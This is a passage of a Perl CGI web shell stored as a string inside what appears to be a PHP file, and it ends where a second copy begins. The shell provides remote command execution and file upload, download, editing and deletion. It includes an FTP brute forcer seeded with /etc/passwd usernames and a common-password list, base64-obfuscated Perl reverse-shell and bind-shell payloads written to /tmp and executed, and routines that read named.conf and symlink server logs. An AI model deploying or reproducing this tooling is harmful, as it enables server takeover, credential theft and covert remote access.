Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
<br><font size='6' color=red>Killed it!</font>
END
	}
}



#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
	local($FileUrl) = @_;
	my $result="";
	if(-e $FileUrl) # if the file exists
	{
		# encode the file link so we can send it to the browser
		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
		&PrintPageHeader("c");
		$result .= <<END;
Sending File $TransferFile...<br>

If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>
END
		$result .= &PrintCommandLineInputForm;
	}
	else # file doesn't exist
	{
		$result .= "Failed to download $FileUrl: $!";
		$result .= &PrintFileDownloadForm;
	}
	return $result;
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
	my $result = "";
	local($SendFile) = @_;
	if(open(SENDFILE, $SendFile)) # file opened for reading
	{
		if($WinNT)
		{
			binmode(SENDFILE);
			binmode(STDOUT);
		}
		$FileSize = (stat($SendFile))[7];
		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
		print "Content-Type: application/x-unknown\n";
		print "Content-Length: $FileSize\n";
		print "Content-Disposition: attachment; filename=$1\n\n";
		print while(<SENDFILE>);
		close(SENDFILE);
		exit(1);
	}
	else # failed to open file
	{
		$result .= "Failed to download $SendFile: $!";
		$result .=&PrintFileDownloadForm;
	}
	return $result;
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
	# get fully qualified path of the file to be downloaded
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
	{
		$TargetFile = $TransferFile;
	}
	else # path is relative
	{
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") # we have to send the file
	{
		&SendFileToBrowser($TargetFile);
	}
	else # we have to send only the link page
	{
		&PrintDownloadLinkPage($TargetFile);
	}
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
	# if no file is specified, print the upload form again
	if($TransferFile eq "")
	{
		return &PrintFileUploadForm;

	}
	my $result="";
	# start the uploading process
	$result .= "Uploading $TransferFile to $CurrentDir...<br>";

	# get the fullly qualified pathname of the file to be created
	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
	$TransferFile =~ m!([^/^\\]*)$!;
	$TargetName .= $PathSep.$1;

	$TargetFileSize = length($in{'filedata'});
	# if the file exists and we are not supposed to overwrite it
	if(-e $TargetName && $Options ne "overwrite")
	{
		$result .= "Failed: Destination file already exists.<br>";
	}
	else # file is not present
	{
		if(open(UPLOADFILE, ">$TargetName"))
		{
			binmode(UPLOADFILE) if $WinNT;
			print UPLOADFILE $in{'filedata'};
			close(UPLOADFILE);
			$result .= "Transfered $TargetFileSize Bytes.<br>";
			$result .= "File Path: $TargetName<br>";
		}
		else
		{
			$result .= "Failed: $!<br>";
		}
	}
	$result .= &PrintCommandLineInputForm;
	return $result;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through  which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
	# if no file is specified, print the download form again
	if($TransferFile eq "")
	{
		&PrintPageHeader("f");
		return &PrintFileDownloadForm;
	}
	
	# get fully qualified path of the file to be downloaded
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
	{
		$TargetFile = $TransferFile;
	}
	else # path is relative
	{
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") # we have to send the file
	{
		return &SendFileToBrowser($TargetFile);
	}
	else # we have to send only the link page
	{
		return &PrintDownloadLinkPage($TargetFile);
	}
}


#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
	my $result="";
	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
	{
		# we change the directory internally. The output of the
		# command is not displayed.
		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
		chop($CurrentDir = `$Command`);
		$result .= &PrintCommandLineInputForm;

		$result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
		# xuat thong tin khi chuyen den 1 thu muc nao do!
		$RunCommand= $WinNT?"dir":"dir -lia";
		$result .= &RunCmd;
	}elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
	{
		$result .=  &SaveFileForm;
	}else
	{
		$result .= &PrintCommandLineInputForm;
		$result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
		$result .=&RunCmd;
	}
	$result .=  "</textarea>";
	return $result;
}

#------------------------------------------------------------------------
# run command
#------------------------------------------------------------------------

sub RunCmd
{
	my $result="";
	$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
	if(!$WinNT)
	{
		$SIG{'ALRM'} = \&CommandTimeout;
		alarm($CommandTimeoutDuration);
	}
	if($ShowDynamicOutput) # show output as it is generated
	{
		$|=1;
		$Command .= " |";
		open(CommandOutput, $Command);
		while(<CommandOutput>)
		{
			$_ =~ s/(\n|\r\n)$//;
			$result .= &HtmlSpecialChars("$_\n");
		}
		$|=0;
	}
	else # show output after command completes
	{
		$result .= &HtmlSpecialChars('$Command');
	}
	if(!$WinNT)
	{
		alarm(0);
	}
	return $result;
}
#==============================================================================
# Form Save File 
#==============================================================================
sub SaveFileForm
{
	my $result ="";
	substr($RunCommand,0,5)="";
	my $file=&trim($RunCommand);
	$save='<br><input name="a" type="submit" value="save" class="submit" >';
	$File=$CurrentDir.$PathSep.$RunCommand;
	my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
	if(-w $File)
	{
		$rows="23"
	}else
	{
		$msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
		$rows="20"
	}
	$Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
	$read=($WinNT)?"type":"less";
	$RunCommand = "$read \"$RunCommand\"";
	$result .=  <<END;
	<form name="f" method="POST" action="$ScriptLocation">

	<input type="hidden" name="d" value="$CurrentDir">
	$Prompt
	<input type="text" size="40" name="c">
	<input name="s" class="submit" type="submit" value="Enter">
	<br>Command: <run> $RunCommand </run>
	<input type="hidden" name="file" value="$file" > $save <br> $msg
	<br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
END
	
	$result .= &RunCmd;
	$result .=  "</textarea>";
	$result .=  "</form>";
	return $result;
}
#==============================================================================
# Save File
#==============================================================================
sub SaveFile($)
{
	my $Data= shift ;
	my $File= shift;
	$File=$CurrentDir.$PathSep.$File;
	if(open(FILE, ">$File"))
	{
		binmode FILE;
		print FILE $Data;
		close FILE;
		return 1;
	}else
	{
		return 0;
	}
}
#------------------------------------------------------------------------------
# Brute Forcer Form
#------------------------------------------------------------------------------
sub BruteForcerForm
{
	my $result="";
	$result .= <<END;

<table>

<tr>
<td colspan="2" align="center">
####################################<br>
Simple FTP brute forcer<br>
####################################
<form name="f" method="POST" action="$ScriptLocation">

<input type="hidden" name="a" value="bruteforcer"/>
</td>
</tr>
<tr>
<td>User:<br><textarea rows="18" cols="30" name="user">
END
chop($result .= `less /etc/passwd | cut -d: -f1`);
$result .= <<'END';
</textarea></td>
<td>

Pass:<br>
<textarea rows="18" cols="30" name="pass">123pass
123!@#
123admin
123abc
123456admin
1234554321
12344321
pass123
admin
admincp
administrator
matkhau
passadmin
p@ssword
p@ssw0rd
password
123456
1234567
12345678
123456789
1234567890
111111
000000
222222
333333
444444
555555
666666
777777
888888
999999
123123
234234
345345
456456
567567
678678
789789
123321
456654
654321
7654321
87654321
987654321
0987654321
admin123
admin123456
abcdef
abcabc
!@#!@#
!@#$%^
!@#$%^&*(
!@#$$#@!
abc123
anhyeuem
iloveyou</textarea>
</td>
</tr>
<tr>
<td colspan="2" align="center">
Sleep:<select name="sleep">

<option>0</option>
<option>1</option>
<option>2</option>

<option>3</option>
</select> 
<input type="submit" class="submit" value="Brute Forcer"/></td></tr>
</form>
</table>
END
return $result;
}
#------------------------------------------------------------------------------
# Brute Forcer
#------------------------------------------------------------------------------
sub BruteForcer
{
	my $result="";
	$Server=$ENV{'SERVER_ADDR'};
	if($in{'user'} eq "")
	{
		$result .= &BruteForcerForm;
	}else
	{
		use Net::FTP; 
		@user= split(/\n/, $in{'user'});
		@pass= split(/\n/, $in{'pass'});
		chomp(@user);
		chomp(@pass);
		$result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
		foreach $username (@user)
		{
			if(!($username eq ""))
			{
				foreach $password (@pass)
				{
					$ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n"; 
					if($ftp->login("$username","$password"))
					{
						$result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
						$ftp->quit();
						break;
					}
					if(!($in{'sleep'} eq "0"))
					{
						sleep(int($in{'sleep'}));
					}
					$ftp->quit();
				}
			}
		}
		$result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
	}
	return $result;
}
#------------------------------------------------------------------------------
# Backconnect Form
#------------------------------------------------------------------------------
sub BackBindForm
{
	return <<END;
	<br><br>

	<table>
	<tr>
	<form name="f" method="POST" action="$ScriptLocation">
	<td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
	<td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
	 Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>

	<td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
	</form>
	</tr>
	<tr>
	<td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
	<br>[+] Try check your Port with <a target="_blank" href="http://www.canyouseeme.org/">http://www.canyouseeme.org/</a>
	<br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>

	</tr>
	</table>

	<br><br>
	<table>
	<tr>
	<form method="POST" action="$ScriptLocation">
	<td>Bind Port: <input type="hidden" name="a" value="backbind"></td>

	<td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">

	 Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
	<td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
	</form>
	</tr>
	<tr>
	<td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
	<br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>

	</tr>
	</table><br>
END
}
#------------------------------------------------------------------------------
# Backconnect use perl
#------------------------------------------------------------------------------
sub BackBind
{
	use MIME::Base64;
	use Socket;	
	$backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7";
	$bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=";

	$ClientAddr = $in{'clientaddr'};
	$ClientPort = int($in{'clientport'});
	if($ClientPort eq 0)
	{
		return &BackBindForm;
	}elsif(!$ClientAddr eq "")
	{
		$Data=decode_base64($backperl);
		if(-w "/tmp/")
		{
			$File="/tmp/backconnect.pl";	
		}else
		{
			$File=$CurrentDir.$PathSep."backconnect.pl";
		}
		open(FILE, ">$File");
		print FILE $Data;
		close FILE;
		system("perl backconnect.pl $ClientAddr $ClientPort");
		unlink($File);
		exit 0;
	}else
	{
		$Data=decode_base64($bindperl);
		if(-w "/tmp")
		{
			$File="/tmp/bindport.pl";	
		}else
		{
			$File=$CurrentDir.$PathSep."bindport.pl";
		}
		open(FILE, ">$File");
		print FILE $Data;
		close FILE;
		system("perl bindport.pl $ClientPort");
		unlink($File);
		exit 0;
	}
}
#------------------------------------------------------------------------------
#  Array List Directory
#------------------------------------------------------------------------------
sub RmDir($) 
{
	my $dir = shift;
    if(opendir(DIR,$dir))
	{
		while($file = readdir(DIR))
		{
			if(($file ne ".") && ($file ne ".."))
			{
				$file= $dir.$PathSep.$file;
				if(-d $file)
				{
					&RmDir($file);
				}
				else
				{
					unlink($file);
				}
			}
		}
		closedir(DIR);
	}
	if(!rmdir($dir))
	{
		
	}
}
sub FileOwner($)
{
	my $file = shift;
	if(-e $file)
	{
		($uid,$gid) = (stat($file))[4,5];
		if($WinNT)
		{
			return "???";
		}
		else
		{
			$name=getpwuid($uid);
			$group=getgrgid($gid);
			return $name."/".$group;
		}
	}
	return "???";
}
sub ParentFolder($)
{
	my $path = shift;
	my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
	chop($path = `$Comm`);
	return $path;
}
sub FilePerms($)
{
	my $file = shift;
	my $ur = "-";
	my $uw = "-";
	if(-e $file)
	{
		if($WinNT)
		{
			if(-r $file){ $ur = "r"; }
			if(-w $file){ $uw = "w"; }
			return $ur . " / " . $uw;
		}else
		{
			$mode=(stat($file))[2];
			$result = sprintf("%04o", $mode & 07777);
			return $result;
		}
	}
	return "0000";
}
sub FileLastModified($)
{
	my $file = shift;
	if(-e $file)
	{
		($la) = (stat($file))[9];
		($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
		$y = $y + 1900;
		@month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
		$lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
		return $lmtime;
	}
	return "???";
}
sub FileSize($)
{
	my $file = shift;
	if(-f $file)
	{
		return -s $file;
	}
	return "0";

}
sub ParseFileSize($)
{
	my $size = shift;
	if($size <= 1024)
	{
		return $size. " B";
	}
	else
	{
		if($size <= 1024*1024) 
		{
			$size = sprintf("%.02f",$size / 1024);
			return $size." KB";
		}
		else 
		{
			$size = sprintf("%.2f",$size / 1024 / 1024);
			return $size." MB";
		}
	}
}
sub trim($)
{
	my $string = shift;
	$string =~ s/^\s+//;
	$string =~ s/\s+$//;
	return $string;
}
sub AddSlashes($)
{
	my $string = shift;
	$string=~ s/\\/\\\\/g;
	return $string;
}
sub ListDir
{
	my $path = $CurrentDir.$PathSep;
	$path=~ s/\\\\/\\/g;
	my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
	if(-d $path)
	{
		my @fname = ();
		my @dname = ();
		if(opendir(DIR,$path))
		{
			while($file = readdir(DIR))
			{
				$f=$path.$file;
				if(-d $f)
				{
					push(@dname,$file);
				}
				else
				{
					push(@fname,$file);
				}
			}
			closedir(DIR);
		}
		@fname = sort { lc($a) cmp lc($b) } @fname;
		@dname = sort { lc($a) cmp lc($b) } @dname;
		$result .= "<div><table width='90%' class='listdir'>

		<tr style='background-color: #3e3e3e'><th>File Name</th>
		<th style='width:100px;'>File Size</th>
		<th style='width:150px;'>Owner</th>
		<th style='width:100px;'>Permission</th>
		<th style='width:150px;'>Last Modified</th>
		<th style='width:260px;'>Action</th></tr>";
		my $style="line";
		my $i=0;
		foreach my $d (@dname)
		{
			$style= ($style eq "line") ? "notline": "line";
			$d = &trim($d);
			$dirname=$d;
			if($d eq "..") 
			{
				$d = &ParentFolder($path);
			}
			elsif($d eq ".") 
			{
				$d = $path;
			}
			else 
			{
				$d = $path.$d;
			}
			$result .= "<tr class='$style'>

			<td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a  href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
			$result .= "<td>DIR</td>";
			$result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
			$result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
			$result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
			$result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a>  | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
			$result .= "</tr>";
			$i++;
		}
		foreach my $f (@fname)
		{
			$style= ($style eq "line") ? "notline": "line";
			$file=$f;
			$f = $path.$f;
			$view = "?dir=".$path."&view=".$f;
			$result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
			$result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
			$result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
			$result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
			$result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
			$result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
			$result .= "</tr>";
			$i++;
		}
		$result .= "</table></div>";
	}
	return $result;
}
#------------------------------------------------------------------------------
# Try to View List User
#------------------------------------------------------------------------------
sub ViewDomainUser
{
	open (domains, '/etc/named.conf') or $err=1;
	my @cnzs = <domains>;
	close d0mains;
	my $style="line";
	my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
	if ($err)
	{
		$result .=  ('<p>C0uldn\'t Bypass it , Sorry</p>');
		return $result;
	}else
	{
		$result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
	}
	foreach my $one (@cnzs)
	{
		if($one =~ m/.*?zone "(.*?)" {/)
		{	
			$style= ($style eq "line") ? "notline": "line";
			$filename= "/etc/valiases/".$one;
			$owner = getpwuid((stat($filename))[4]);
			$result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
		}
	}
	$result .= '</table>';
	return $result;
}
#------------------------------------------------------------------------------
# View Log
#------------------------------------------------------------------------------
sub ViewLog
{
	if($WinNT)
	{
		return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
	}
	my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
	my @pathlog=(
				'/usr/local/apache/logs/error_log',
				'/var/log/httpd/error_log',
				'/usr/local/apache/logs/access_log'
				);
	my $i=0;
	my $perms;
	my $sl;
	foreach my $log (@pathlog)
	{
		if(-w $log)
		{
			$perms="OK";
		}else
		{
			chop($sl = `ln -s $log error_log_$i`);
			if(&trim($ls) eq "")
			{
				if(-r $ls)
				{
					$perms="OK";
					$log="error_log_".$i;
				}
			}else
			{
				$perms="<font style='color: red;'>Cancel<font>";
			}
		}
		$result .=<<END;
		<tr>

			<form action="" method="post">
			<td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
			<td><input class="submit" type="submit" value="Try" /></td>
			<input type="hidden" id="log_$i" name="c" value="less $log"/>
			<input type="hidden" name="a" value="command" />
			<input type="hidden" name="d" value="$CurrentDir" />
			</form>
			<td>$perms</td>

		</tr>
END
		$i++;
	}
	$result .="</table>";
	return $result;
}
#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};

$Action = "command" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = &trim($in{'d'});
# mac dinh xuat thong tin neu ko co lenh nao!
$RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) 		# user needs/has to login
{
	&PerformLogin;
}elsif($Action eq "gui") # GUI directory
{
	&PrintPageHeader;
	if(!$WinNT)
	{
		$chmod=int($in{'chmod'});
		if(!($chmod eq 0))
		{
			$chmod=int($in{'chmod'});
			$file=$CurrentDir.$PathSep.$TransferFile;
			chop($result= `chmod $chmod "$file"`);
			if(&trim($result) eq "")
			{
				print "<run> Done! </run><br>";
			}else
			{
				print "<run> Sorry! You dont have permissions! </run><br>";
			}
		}
	}
	$rename=$in{'rename'};
	if(!$rename eq "")
	{
		if(rename($TransferFile,$rename))
		{
			print "<run> Done! </run><br>";
		}else
		{
			print "<run> Sorry! You dont have permissions! </run><br>";
		}
	}
	$remove=$in{'remove'};
	if($remove ne "")
	{
		$rm = $CurrentDir.$PathSep.$remove;
		if(-d $rm)
		{
			&RmDir($rm);
		}else
		{
			if(unlink($rm))
			{
				print "<run> Done! </run><br>";
			}else
			{
				print "<run> Sorry! You dont have permissions! </run><br>";
			}			
		}
	}
	print &ListDir;

}
elsif($Action eq "command")				 	# user wants to run a command
{
	&PrintPageHeader("c");
	print &ExecuteCommand;
}
elsif($Action eq "save")				 	# user wants to save a file
{
	&PrintPageHeader;
	if(&SaveFile($in{'data'},$in{'file'}))
	{
		print "<run> Done! </run><br>";
	}else
	{
		print "<run> Sorry! You dont have permissions! </run><br>";
	}
	print &ListDir;
}
elsif($Action eq "upload") 					# user wants to upload a file
{
	&PrintPageHeader;

	print &UploadFile;
}
elsif($Action eq "backbind") 				# user wants to back connect or bind port
{
	&PrintPageHeader("clientport");
	print &BackBind;
}
elsif($Action eq "bruteforcer") 			# user wants to brute force
{
	&PrintPageHeader;
	print &BruteForcer;
}elsif($Action eq "download") 				# user wants to download a file
{
	print &DownloadFile;
}elsif($Action eq "checklog") 				# user wants to view log file
{
	&PrintPageHeader;
	print &ViewLog;

}elsif($Action eq "domainsuser") 			# user wants to view list user/domain
{
	&PrintPageHeader;
	print &ViewDomainUser;
}elsif($Action eq "logout") 				# user wants to logout
{
	&PerformLogout;
}
&PrintPageFooter;");
14define("CGI_2", "#!/usr/bin/perl -I/usr/local/bandmin
# Copyright (C) 2001 Rohitab Batra
# Recoded By Con7ext
# Thanks To : 0x1999 - Xai Syndicate Team - And You
 
$WinNT = 0;
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 10;
$ShowDynamicOutput = 1;
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
sub ReadParse
{
    local (*in) = @_ if @_;
    local ($i, $loc, $key, $val);
   
    $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
 
    if($ENV{'REQUEST_METHOD'} eq "GET")
    {
        $in = $ENV{'QUERY_STRING'};
    }
    elsif($ENV{'REQUEST_METHOD'} eq "POST")
    {
        binmode(STDIN) if $MultipartFormData & $WinNT;
        read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
    }
 
    # handle file upload data
    if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
    {
        $Boundary = '--'.$1; # please refer to RFC1867
        @list = split(/$Boundary/, $in);
        $HeaderBody = $list[1];
        $HeaderBody =~ /\r\n\r\n|\n\n/;
        $Header = $`;
        $Body = $';
        $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
        $in{'filedata'} = $Body;
        $Header =~ /filename=\"(.+)\"/;
        $in{'f'} = $1;
        $in{'f'} =~ s/\"//g;
        $in{'f'} =~ s/\s//g;
 
        # parse trailer
        for($i=2; $list[$i]; $i++)
        {
            $list[$i] =~ s/^.+name=$//;
            $list[$i] =~ /\"(\w+)\"/;
            $key = $1;
            $val = $';
            $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} = $val;
        }
    }
    else # standard post data (url encoded, not multipart)
    {
        @in = split(/&/, $in);
        foreach $i (0 .. $#in)
        {
            $in[$i] =~ s/\+/ /g;
            ($key, $val) = split(/=/, $in[$i], 2);
            $key =~ s/%(..)/pack("c", hex($1))/ge;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} .= "\0" if (defined($in{$key}));
            $in{$key} .= $val;
        }
    }
}
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
